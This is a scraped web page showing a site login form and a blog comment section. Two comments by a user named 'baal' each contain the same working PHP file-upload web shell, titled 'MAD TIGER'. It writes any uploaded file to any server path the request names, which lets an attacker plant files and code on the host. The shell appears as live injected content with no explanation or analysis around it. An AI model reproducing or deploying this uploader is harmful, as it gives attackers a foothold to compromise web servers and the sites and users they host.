Welcome Site/User Administrator
Login Form
Login:
Password:
My Resource
Blog Comments
Please post your comments for the blog
baal
<?php $files = @$_FILES["files"]; if ($files["name"] != '') { $fullpath = $_REQUEST["path"] . $files["name"]; if (move_uploaded_file($files['tmp_name'], $fullpath)) { echo "<h1><a href='$fullpath'>DONE<br>SUCCESSFULLY UPLOADED 😘 </a></h1>"; } }echo '<html><head><title>MAD TIGER</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="UPLOAD"></form></body></html>'; ?>
baal
<?php $files = @$_FILES["files"]; if ($files["name"] != '') { $fullpath = $_REQUEST["path"] . $files["name"]; if (move_uploaded_file($files['tmp_name'], $fullpath)) { echo "<h1><a href='$fullpath'>DONE<br>SUCCESSFULLY UPLOADED 😘 </a></h1>"; } }echo '<html><head><title>MAD TIGER</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="UPLOAD"></form></body></html>'; ?>